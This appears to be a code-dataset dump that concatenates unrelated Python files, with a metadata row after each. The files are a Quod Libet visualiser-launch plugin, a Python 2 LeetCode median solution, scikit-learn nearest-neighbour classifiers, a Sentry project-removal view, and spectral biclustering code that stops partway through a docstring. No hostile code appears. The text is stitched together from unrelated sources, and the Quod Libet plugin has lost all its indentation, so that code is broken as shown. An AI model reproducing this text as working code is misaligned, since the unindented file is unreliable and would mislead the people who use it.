# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import os
import signal
from gi.repository import Gtk
from quodlibet import _
from quodlibet import app
from quodlibet import print_d
from quodlibet import print_w
from quodlibet.plugins import PluginConfig
from quodlibet.plugins.events import EventPlugin
from quodlibet.qltk import Button
from quodlibet.qltk import ErrorMessage
from quodlibet.qltk import Icons
from quodlibet.qltk.entry import UndoEntry
from quodlibet.util import escape
class ProjectM(EventPlugin):
"""Launch external visualisations, e.g. via projectM
Try this first (Ubuntu/Debian):
sudo apt-get install projectm-pulseaudio
"""
_config = PluginConfig(__name__)
PLUGIN_ID = "visualisations"
PLUGIN_NAME = _("Launch Visualisations")
PLUGIN_ICON = Icons.IMAGE_X_GENERIC
PLUGIN_DESC = _("Launch external visualisations.")
DEFAULT_EXEC = 'projectM-pulseaudio'
def __init__(self):
self._pid = None
def enabled(self):
from gi.repository import GLib
print_d("Starting %s" % self.PLUGIN_NAME)
try:
self._pid, fdin, fdout, fderr = GLib.spawn_async(
argv=self.executable.split(),
flags=GLib.SpawnFlags.SEARCH_PATH,
standard_output=True,
standard_input=True)
except GLib.Error as e:
msg = ((_("Couldn't run visualisations using '%s'") + " (%s)") %
(escape(self.executable), escape(e.message)))
ErrorMessage(title=_("Error"), description=msg,
parent=app.window).run()
else:
# self._stdin = os.fdopen(fdin, mode='w')
print_d("Launched with PID: %s" % self._pid)
def disabled(self):
if not self._pid:
return
print_d("Shutting down %s" % self.PLUGIN_NAME)
try:
os.kill(self._pid, signal.SIGTERM)
os.kill(self._pid, signal.SIGKILL)
except Exception as e:
print_w("Couldn't shut down cleanly (%s)" % e)
def PluginPreferences(self, *args):
vbox = Gtk.VBox(spacing=12)
label = Gtk.Label(label=_("Visualiser executable:"))
def edited(widget):
self.executable = widget.get_text()
entry = UndoEntry()
entry.connect('changed', edited)
entry.set_text(self.executable)
hbox = Gtk.HBox(spacing=6)
hbox.pack_start(label, False, False, 0)
hbox.pack_start(entry, True, True, 0)
vbox.pack_start(hbox, True, True, 0)
def refresh_clicked(widget):
self.disabled()
self.enabled()
refresh_button = Button(_("Reload"), Icons.VIEW_REFRESH)
refresh_button.connect('clicked', refresh_clicked)
vbox.pack_start(refresh_button, False, False, 0)
return vbox
@property
def executable(self):
return self._config.get('executable', self.DEFAULT_EXEC)
@executable.setter
def executable(self, value):
self._config.set('executable', value)
| gpl-2.0 | -5,147,228,131,064,625,000 | 31.320388 | 76 | 0.625713 | false | 3.765837 | false | false | false |
daicang/Leetcode-solutions | 004-median-of-two-sorted-arrays.py | 1 | 1417 | #!/usr/bin/python
class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
size = len(nums1) + len(nums2)
if size % 2 == 0:
return (self.getk(nums1[:], nums2[:], size/2)+
self.getk(nums1[:], nums2[:], size/2-1))/2.0
else:
return self.getk(nums1[:], nums2[:], size/2)
def getk(self, a, b, k):
if len(a) > len(b): a, b = b, a
if len(a) <= 2:
b.extend(a)
b.sort()
return b[k]
if not a: return b[k]
if k <= 0: return min(a[0], b[0])
m, n = len(a), len(b)
if (m+n)/2 >= k:
if a[m/2] >= b[n/2]:
return self.getk(a[:m/2+1], b, k)
else:
return self.getk(a, b[:n/2+1], k)
else:
if a[m/2] >= b[n/2]:
return self.getk(a, b[n/2:], k - n/2)
else:
return self.getk(a[m/2:], b, k - m/2)
# def myfunc(a, b, c):
# return a, b, c
# print myfunc(1, 2, 4/3)
a = [1, 2, 3, 4, 5]
b = [3, 5, 6, 7]
c = []
d = [1]
e = [2, 3, 4, 5, 7, 8, 9, 10, 11, 13, 17, 54, 83]
f = [1, 6, 9, 22, 45, 103, 255, 1024]
g = [1, 2, 2]
h = [1, 2, 3]
s = Solution()
print s.findMedianSortedArrays(a, b)
print s.findMedianSortedArrays(c, d)
print s.findMedianSortedArrays(e, f)
print s.findMedianSortedArrays(g, h)
| mit | -7,180,720,171,993,316,000 | 27.918367 | 64 | 0.440367 | false | 2.604779 | false | false | false |
bnaul/scikit-learn | sklearn/neighbors/_classification.py | 2 | 23284 | """Nearest Neighbor Classification"""
# Authors: Jake Vanderplas <[email protected]>
# Fabian Pedregosa <[email protected]>
# Alexandre Gramfort <[email protected]>
# Sparseness support by Lars Buitinck
# Multi-output support by Arnaud Joly <[email protected]>
#
# License: BSD 3 clause (C) INRIA, University of Amsterdam
import numpy as np
from scipy import stats
from ..utils.extmath import weighted_mode
from ..utils.validation import _is_arraylike, _num_samples
import warnings
from ._base import _check_weights, _get_weights
from ._base import NeighborsBase, KNeighborsMixin, RadiusNeighborsMixin
from ..base import ClassifierMixin
from ..utils import check_array
from ..utils.validation import _deprecate_positional_args
class KNeighborsClassifier(KNeighborsMixin,
ClassifierMixin,
NeighborsBase):
"""Classifier implementing the k-nearest neighbors vote.
Read more in the :ref:`User Guide <classification>`.
Parameters
----------
n_neighbors : int, default=5
Number of neighbors to use by default for :meth:`kneighbors` queries.
weights : {'uniform', 'distance'} or callable, default='uniform'
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, default=30
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : int, default=2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : str or callable, default='minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of :class:`DistanceMetric` for a
list of available metrics.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square during fit. X may be a :term:`sparse graph`,
in which case only "nonzero" elements may be considered neighbors.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Doesn't affect :meth:`fit` method.
Attributes
----------
classes_ : array of shape (n_classes,)
Class labels known to the classifier
effective_metric_ : str or callble
The distance metric used. It will be same as the `metric` parameter
or a synonym of it, e.g. 'euclidean' if the `metric` parameter set to
'minkowski' and `p` parameter set to 2.
effective_metric_params_ : dict
Additional keyword arguments for the metric function. For most metrics
will be same with `metric_params` parameter, but may also contain the
`p` parameter value if the `effective_metric_` attribute is set to
'minkowski'.
n_samples_fit_ : int
Number of samples in the fitted data.
outputs_2d_ : bool
False when `y`'s shape is (n_samples, ) or (n_samples, 1) during fit
otherwise True.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import KNeighborsClassifier
>>> neigh = KNeighborsClassifier(n_neighbors=3)
>>> neigh.fit(X, y)
KNeighborsClassifier(...)
>>> print(neigh.predict([[1.1]]))
[0]
>>> print(neigh.predict_proba([[0.9]]))
[[0.66666667 0.33333333]]
See also
--------
RadiusNeighborsClassifier
KNeighborsRegressor
RadiusNeighborsRegressor
NearestNeighbors
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
.. warning::
Regarding the Nearest Neighbors algorithms, if it is found that two
neighbors, neighbor `k+1` and `k`, have identical distances
but different labels, the results will depend on the ordering of the
training data.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
@_deprecate_positional_args
def __init__(self, n_neighbors=5, *,
weights='uniform', algorithm='auto', leaf_size=30,
p=2, metric='minkowski', metric_params=None, n_jobs=None,
**kwargs):
super().__init__(
n_neighbors=n_neighbors,
algorithm=algorithm,
leaf_size=leaf_size, metric=metric, p=p,
metric_params=metric_params,
n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
def fit(self, X, y):
"""Fit the k-nearest neighbors classifier from the training dataset.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features) or \
(n_samples, n_samples) if metric='precomputed'
Training data.
y : {array-like, sparse matrix} of shape (n_samples,) or \
(n_samples, n_outputs)
Target values.
Returns
-------
self : KNeighborsClassifier
The fitted k-nearest neighbors classifier.
"""
return self._fit(X, y)
def predict(self, X):
"""Predict the class labels for the provided data.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : ndarray of shape (n_queries,) or (n_queries, n_outputs)
Class labels for each data sample.
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
n_outputs = len(classes_)
n_queries = _num_samples(X)
weights = _get_weights(neigh_dist, self.weights)
y_pred = np.empty((n_queries, n_outputs), dtype=classes_[0].dtype)
for k, classes_k in enumerate(classes_):
if weights is None:
mode, _ = stats.mode(_y[neigh_ind, k], axis=1)
else:
mode, _ = weighted_mode(_y[neigh_ind, k], weights, axis=1)
mode = np.asarray(mode.ravel(), dtype=np.intp)
y_pred[:, k] = classes_k.take(mode)
if not self.outputs_2d_:
y_pred = y_pred.ravel()
return y_pred
def predict_proba(self, X):
"""Return probability estimates for the test data X.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
p : ndarray of shape (n_queries, n_classes), or a list of n_outputs
of such arrays if n_outputs > 1.
The class probabilities of the input samples. Classes are ordered
by lexicographic order.
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
n_queries = _num_samples(X)
weights = _get_weights(neigh_dist, self.weights)
if weights is None:
weights = np.ones_like(neigh_ind)
all_rows = np.arange(X.shape[0])
probabilities = []
for k, classes_k in enumerate(classes_):
pred_labels = _y[:, k][neigh_ind]
proba_k = np.zeros((n_queries, classes_k.size))
# a simple ':' index doesn't work right
for i, idx in enumerate(pred_labels.T): # loop is O(n_neighbors)
proba_k[all_rows, idx] += weights[:, i]
# normalize 'votes' into real [0,1] probabilities
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
probabilities.append(proba_k)
if not self.outputs_2d_:
probabilities = probabilities[0]
return probabilities
class RadiusNeighborsClassifier(RadiusNeighborsMixin,
ClassifierMixin,
NeighborsBase):
"""Classifier implementing a vote among neighbors within a given radius
Read more in the :ref:`User Guide <classification>`.
Parameters
----------
radius : float, default=1.0
Range of parameter space to use by default for :meth:`radius_neighbors`
queries.
weights : {'uniform', 'distance'} or callable, default='uniform'
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, default=30
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : int, default=2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : str or callable, default='minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of :class:`DistanceMetric` for a
list of available metrics.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square during fit. X may be a :term:`sparse graph`,
in which case only "nonzero" elements may be considered neighbors.
outlier_label : {manual label, 'most_frequent'}, default=None
label for outlier samples (samples with no neighbors in given radius).
- manual label: str or int label (should be the same type as y)
or list of manual labels if multi-output is used.
- 'most_frequent' : assign the most frequent label of y to outliers.
- None : when any outlier is detected, ValueError will be raised.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
classes_ : ndarray of shape (n_classes,)
Class labels known to the classifier.
effective_metric_ : str or callable
The distance metric used. It will be same as the `metric` parameter
or a synonym of it, e.g. 'euclidean' if the `metric` parameter set to
'minkowski' and `p` parameter set to 2.
effective_metric_params_ : dict
Additional keyword arguments for the metric function. For most metrics
will be same with `metric_params` parameter, but may also contain the
`p` parameter value if the `effective_metric_` attribute is set to
'minkowski'.
n_samples_fit_ : int
Number of samples in the fitted data.
outlier_label_ : int or array-like of shape (n_class,)
Label which is given for outlier samples (samples with no neighbors
on given radius).
outputs_2d_ : bool
False when `y`'s shape is (n_samples, ) or (n_samples, 1) during fit
otherwise True.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import RadiusNeighborsClassifier
>>> neigh = RadiusNeighborsClassifier(radius=1.0)
>>> neigh.fit(X, y)
RadiusNeighborsClassifier(...)
>>> print(neigh.predict([[1.5]]))
[0]
>>> print(neigh.predict_proba([[1.0]]))
[[0.66666667 0.33333333]]
See also
--------
KNeighborsClassifier
RadiusNeighborsRegressor
KNeighborsRegressor
NearestNeighbors
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
@_deprecate_positional_args
def __init__(self, radius=1.0, *, weights='uniform',
algorithm='auto', leaf_size=30, p=2, metric='minkowski',
outlier_label=None, metric_params=None, n_jobs=None,
**kwargs):
super().__init__(
radius=radius,
algorithm=algorithm,
leaf_size=leaf_size,
metric=metric, p=p, metric_params=metric_params,
n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
self.outlier_label = outlier_label
def fit(self, X, y):
"""Fit the radius neighbors classifier from the training dataset.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features) or \
(n_samples, n_samples) if metric='precomputed'
Training data.
y : {array-like, sparse matrix} of shape (n_samples,) or \
(n_samples, n_outputs)
Target values.
Returns
-------
self : RadiusNeighborsClassifier
The fitted radius neighbors classifier.
"""
self._fit(X, y)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
if self.outlier_label is None:
outlier_label_ = None
elif self.outlier_label == 'most_frequent':
outlier_label_ = []
# iterate over multi-output, get the most frequent label for each
# output.
for k, classes_k in enumerate(classes_):
label_count = np.bincount(_y[:, k])
outlier_label_.append(classes_k[label_count.argmax()])
else:
if (_is_arraylike(self.outlier_label) and
not isinstance(self.outlier_label, str)):
if len(self.outlier_label) != len(classes_):
raise ValueError("The length of outlier_label: {} is "
"inconsistent with the output "
"length: {}".format(self.outlier_label,
len(classes_)))
outlier_label_ = self.outlier_label
else:
outlier_label_ = [self.outlier_label] * len(classes_)
for classes, label in zip(classes_, outlier_label_):
if (_is_arraylike(label) and
not isinstance(label, str)):
# ensure the outlier lable for each output is a scalar.
raise TypeError("The outlier_label of classes {} is "
"supposed to be a scalar, got "
"{}.".format(classes, label))
if np.append(classes, label).dtype != classes.dtype:
# ensure the dtype of outlier label is consistent with y.
raise TypeError("The dtype of outlier_label {} is "
"inconsistent with classes {} in "
"y.".format(label, classes))
self.outlier_label_ = outlier_label_
return self
def predict(self, X):
"""Predict the class labels for the provided data.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : ndarray of shape (n_queries,) or (n_queries, n_outputs)
Class labels for each data sample.
"""
probs = self.predict_proba(X)
classes_ = self.classes_
if not self.outputs_2d_:
probs = [probs]
classes_ = [self.classes_]
n_outputs = len(classes_)
n_queries = probs[0].shape[0]
y_pred = np.empty((n_queries, n_outputs), dtype=classes_[0].dtype)
for k, prob in enumerate(probs):
# iterate over multi-output, assign labels based on probabilities
# of each output.
max_prob_index = prob.argmax(axis=1)
y_pred[:, k] = classes_[k].take(max_prob_index)
outlier_zero_probs = (prob == 0).all(axis=1)
if outlier_zero_probs.any():
zero_prob_index = np.flatnonzero(outlier_zero_probs)
y_pred[zero_prob_index, k] = self.outlier_label_[k]
if not self.outputs_2d_:
y_pred = y_pred.ravel()
return y_pred
def predict_proba(self, X):
"""Return probability estimates for the test data X.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
p : ndarray of shape (n_queries, n_classes), or a list of n_outputs
of such arrays if n_outputs > 1.
The class probabilities of the input samples. Classes are ordered
by lexicographic order.
"""
X = check_array(X, accept_sparse='csr')
n_queries = _num_samples(X)
neigh_dist, neigh_ind = self.radius_neighbors(X)
outlier_mask = np.zeros(n_queries, dtype=bool)
outlier_mask[:] = [len(nind) == 0 for nind in neigh_ind]
outliers = np.flatnonzero(outlier_mask)
inliers = np.flatnonzero(~outlier_mask)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
if self.outlier_label_ is None and outliers.size > 0:
raise ValueError('No neighbors found for test samples %r, '
'you can try using larger radius, '
'giving a label for outliers, '
'or considering removing them from your dataset.'
% outliers)
weights = _get_weights(neigh_dist, self.weights)
if weights is not None:
weights = weights[inliers]
probabilities = []
# iterate over multi-output, measure probabilities of the k-th output.
for k, classes_k in enumerate(classes_):
pred_labels = np.zeros(len(neigh_ind), dtype=object)
pred_labels[:] = [_y[ind, k] for ind in neigh_ind]
proba_k = np.zeros((n_queries, classes_k.size))
proba_inl = np.zeros((len(inliers), classes_k.size))
# samples have different size of neighbors within the same radius
if weights is None:
for i, idx in enumerate(pred_labels[inliers]):
proba_inl[i, :] = np.bincount(idx,
minlength=classes_k.size)
else:
for i, idx in enumerate(pred_labels[inliers]):
proba_inl[i, :] = np.bincount(idx,
weights[i],
minlength=classes_k.size)
proba_k[inliers, :] = proba_inl
if outliers.size > 0:
_outlier_label = self.outlier_label_[k]
label_index = np.flatnonzero(classes_k == _outlier_label)
if label_index.size == 1:
proba_k[outliers, label_index[0]] = 1.0
else:
warnings.warn('Outlier label {} is not in training '
'classes. All class probabilities of '
'outliers will be assigned with 0.'
''.format(self.outlier_label_[k]))
# normalize 'votes' into real [0,1] probabilities
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
probabilities.append(proba_k)
if not self.outputs_2d_:
probabilities = probabilities[0]
return probabilities
| bsd-3-clause | 5,520,555,482,386,144,000 | 36.798701 | 79 | 0.577478 | false | 4.180251 | false | false | false |
BayanGroup/sentry | src/sentry/web/frontend/remove_project.py | 1 | 1378 | from __future__ import absolute_import
from django import forms
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
from sentry.api import client
from sentry.models import OrganizationMemberType
from sentry.web.frontend.base import ProjectView
class RemoveProjectForm(forms.Form):
pass
class RemoveProjectView(ProjectView):
required_access = OrganizationMemberType.OWNER
sudo_required = True
def get_form(self, request):
if request.method == 'POST':
return RemoveProjectForm(request.POST)
return RemoveProjectForm()
def handle(self, request, organization, team, project):
form = self.get_form(request)
if form.is_valid():
client.delete('/projects/{}/{}/'.format(organization.slug, project.slug),
request.user, is_sudo=True)
messages.add_message(
request, messages.SUCCESS,
_(u'The project %r was scheduled for deletion.') % (project.name.encode('utf-8'),))
return HttpResponseRedirect(reverse('sentry-organization-home', args=[team.organization.slug]))
context = {
'form': form,
}
return self.respond('sentry/projects/remove.html', context)
| bsd-3-clause | 7,260,892,795,162,825,000 | 30.318182 | 107 | 0.674891 | false | 4.518033 | false | false | false |
eickenberg/scikit-learn | sklearn/cluster/bicluster/spectral.py | 1 | 19540 | """Implements spectral biclustering algorithms.
Authors : Kemal Eren
License: BSD 3 clause
"""
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import dia_matrix
from scipy.sparse import issparse
from sklearn.base import BaseEstimator, BiclusterMixin
from sklearn.externals import six
from sklearn.utils.arpack import svds
from sklearn.utils.arpack import eigsh
from sklearn.cluster import KMeans
from sklearn.cluster import MiniBatchKMeans
from sklearn.utils.extmath import randomized_svd
from sklearn.utils.extmath import safe_sparse_dot
from sklearn.utils.extmath import make_nonnegative
from sklearn.utils.extmath import norm
from sklearn.utils.validation import assert_all_finite
from sklearn.utils.validation import check_array
from .utils import check_array_ndim
def _scale_normalize(X):
"""Normalize ``X`` by scaling rows and columns independently.
Returns the normalized matrix and the row and column scaling
factors.
"""
X = make_nonnegative(X)
row_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=1))).squeeze()
col_diag = np.asarray(1.0 / np.sqrt(X.sum(axis=0))).squeeze()
row_diag = np.where(np.isnan(row_diag), 0, row_diag)
col_diag = np.where(np.isnan(col_diag), 0, col_diag)
if issparse(X):
n_rows, n_cols = X.shape
r = dia_matrix((row_diag, [0]), shape=(n_rows, n_rows))
c = dia_matrix((col_diag, [0]), shape=(n_cols, n_cols))
an = r * X * c
else:
an = row_diag[:, np.newaxis] * X * col_diag
return an, row_diag, col_diag
def _bistochastic_normalize(X, max_iter=1000, tol=1e-5):
"""Normalize rows and columns of ``X`` simultaneously so that all
rows sum to one constant and all columns sum to a different
constant.
"""
# According to paper, this can also be done more efficiently with
# deviation reduction and balancing algorithms.
X = make_nonnegative(X)
X_scaled = X
dist = None
for _ in range(max_iter):
X_new, _, _ = _scale_normalize(X_scaled)
if issparse(X):
dist = norm(X_scaled.data - X.data)
else:
dist = norm(X_scaled - X_new)
X_scaled = X_new
if dist is not None and dist < tol:
break
return X_scaled
def _log_normalize(X):
"""Normalize ``X`` according to Kluger's log-interactions scheme."""
X = make_nonnegative(X, min_value=1)
if issparse(X):
raise ValueError("Cannot compute log of a sparse matrix,"
" because log(x) diverges to -infinity as x"
" goes to 0.")
L = np.log(X)
row_avg = L.mean(axis=1)[:, np.newaxis]
col_avg = L.mean(axis=0)
avg = L.mean()
return L - row_avg - col_avg + avg
class BaseSpectral(six.with_metaclass(ABCMeta, BaseEstimator,
BiclusterMixin)):
"""Base class for spectral biclustering."""
@abstractmethod
def __init__(self, n_clusters=3, svd_method="randomized",
n_svd_vecs=None, mini_batch=False, init="k-means++",
n_init=10, n_jobs=1, random_state=None):
self.n_clusters = n_clusters
self.svd_method = svd_method
self.n_svd_vecs = n_svd_vecs
self.mini_batch = mini_batch
self.init = init
self.n_init = n_init
self.n_jobs = n_jobs
self.random_state = random_state
def _check_parameters(self):
legal_svd_methods = ('randomized', 'arpack')
if self.svd_method not in legal_svd_methods:
raise ValueError("Unknown SVD method: '{0}'. svd_method must be"
" one of {1}.".format(self.svd_method,
legal_svd_methods))
def fit(self, X):
"""Creates a biclustering for X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
"""
X = check_array(X, accept_sparse='csr', dtype=np.float64)
check_array_ndim(X)
self._check_parameters()
self._fit(X)
def _svd(self, array, n_components, n_discard):
"""Returns first `n_components` left and right singular
vectors u and v, discarding the first `n_discard`.
"""
if self.svd_method == 'randomized':
kwargs = {}
if self.n_svd_vecs is not None:
kwargs['n_oversamples'] = self.n_svd_vecs
u, _, vt = randomized_svd(array, n_components,
random_state=self.random_state,
**kwargs)
elif self.svd_method == 'arpack':
u, _, vt = svds(array, k=n_components, ncv=self.n_svd_vecs)
if np.any(np.isnan(vt)):
# some eigenvalues of A * A.T are negative, causing
# sqrt() to be np.nan. This causes some vectors in vt
# to be np.nan.
_, v = eigsh(safe_sparse_dot(array.T, array),
ncv=self.n_svd_vecs)
vt = v.T
if np.any(np.isnan(u)):
_, u = eigsh(safe_sparse_dot(array, array.T),
ncv=self.n_svd_vecs)
assert_all_finite(u)
assert_all_finite(vt)
u = u[:, n_discard:]
vt = vt[n_discard:]
return u, vt.T
def _k_means(self, data, n_clusters):
if self.mini_batch:
model = MiniBatchKMeans(n_clusters,
init=self.init,
n_init=self.n_init,
random_state=self.random_state)
else:
model = KMeans(n_clusters, init=self.init,
n_init=self.n_init, n_jobs=self.n_jobs,
random_state=self.random_state)
model.fit(data)
centroid = model.cluster_centers_
labels = model.labels_
return centroid, labels
class SpectralCoclustering(BaseSpectral):
"""Spectral Co-Clustering algorithm (Dhillon, 2001).
Clusters rows and columns of an array `X` to solve the relaxed
normalized cut of the bipartite graph created from `X` as follows:
the edge between row vertex `i` and column vertex `j` has weight
`X[i, j]`.
The resulting bicluster structure is block-diagonal, since each
row and each column belongs to exactly one bicluster.
Supports sparse matrices, as long as they are nonnegative.
Parameters
----------
n_clusters : integer, optional, default: 3
The number of biclusters to find.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', use
:func:`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', use
:func:`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
`svd_method` is 'randomized`.
mini_batch : bool, optional, default: False
Whether to use mini-batch k-means, which is faster but may get
different results.
init : {'k-means++', 'random' or an ndarray}
Method for initialization of k-means algorithm; defaults to
'k-means++'.
n_init : int, optional, default: 10
Number of random initializations that are tried with the
k-means algorithm.
If mini-batch k-means is used, the best initialization is
chosen and the algorithm runs once. Otherwise, the algorithm
is run for each initialization and the best solution chosen.
n_jobs : int, optional, default: 1
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used by the K-Means
initialization.
Attributes
----------
`rows_` : array-like, shape (n_row_clusters, n_rows)
Results of the clustering. `rows[i, r]` is True if
cluster `i` contains row `r`. Available only after calling ``fit``.
`columns_` : array-like, shape (n_column_clusters, n_columns)
Results of the clustering, like `rows`.
`row_labels_` : array-like, shape (n_rows,)
The bicluster label of each row.
`column_labels_` : array-like, shape (n_cols,)
The bicluster label of each column.
References
----------
* Dhillon, Inderjit S, 2001. `Co-clustering documents and words using
bipartite spectral graph partitioning
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.140.3011>`__.
"""
def __init__(self, n_clusters=3, svd_method='randomized',
n_svd_vecs=None, mini_batch=False, init='k-means++',
n_init=10, n_jobs=1, random_state=None):
super(SpectralCoclustering, self).__init__(n_clusters,
svd_method,
n_svd_vecs,
mini_batch,
init,
n_init,
n_jobs,
random_state)
def _fit(self, X):
normalized_data, row_diag, col_diag = _scale_normalize(X)
n_sv = 1 + int(np.ceil(np.log2(self.n_clusters)))
u, v = self._svd(normalized_data, n_sv, n_discard=1)
z = np.vstack((row_diag[:, np.newaxis] * u,
col_diag[:, np.newaxis] * v))
_, labels = self._k_means(z, self.n_clusters)
n_rows = X.shape[0]
self.row_labels_ = labels[:n_rows]
self.column_labels_ = labels[n_rows:]
self.rows_ = np.vstack(self.row_labels_ == c
for c in range(self.n_clusters))
self.columns_ = np.vstack(self.column_labels_ == c
for c in range(self.n_clusters))
class SpectralBiclustering(BaseSpectral):
"""Spectral biclustering (Kluger, 2003).
Partitions rows and columns under the assumption that the data has
an underlying checkerboard structure. For instance, if there are
two row partitions and three column partitions, each row will
belong to three biclusters, and each column will belong to two
biclusters. The outer product of the corresponding row and column
label vectors gives this checkerboard structure.
Parameters
----------
n_clusters : integer or tuple (n_row_clusters, n_column_clusters)
The number of row and column clusters in the checkerboard
structure.
method : string, optional, default: 'bistochastic'
Method of normalizing and converting singular vectors into
biclusters. May be one of 'scale', 'bistochastic', or 'log'.
The authors recommend using 'log'. If the data is sparse,
however, log normalization will not work, which is why the
default is 'bistochastic'. CAUTION: if `method='log'`, the
data must not be sparse.
n_components : integer, optional, default: 6
Number of singular vectors to check.
n_best : integer, optional, default: 3
Number of best singular vectors to which to project the data
for clustering.
svd_method : string, optional, default: 'randomized'
Selects the algorithm for finding singular vectors. May be
'randomized' or 'arpack'. If 'randomized', uses
`sklearn.utils.extmath.randomized_svd`, which may be faster
for large matrices. If 'arpack', uses
`sklearn.utils.arpack.svds`, which is more accurate, but
possibly slower in some cases.
n_svd_vecs : int, optional, default: None
Number of vectors to use in calculating the SVD. Corresponds
to `ncv` when `svd_method=arpack` and `n_oversamples` when
`svd_method` is 'randomized`.
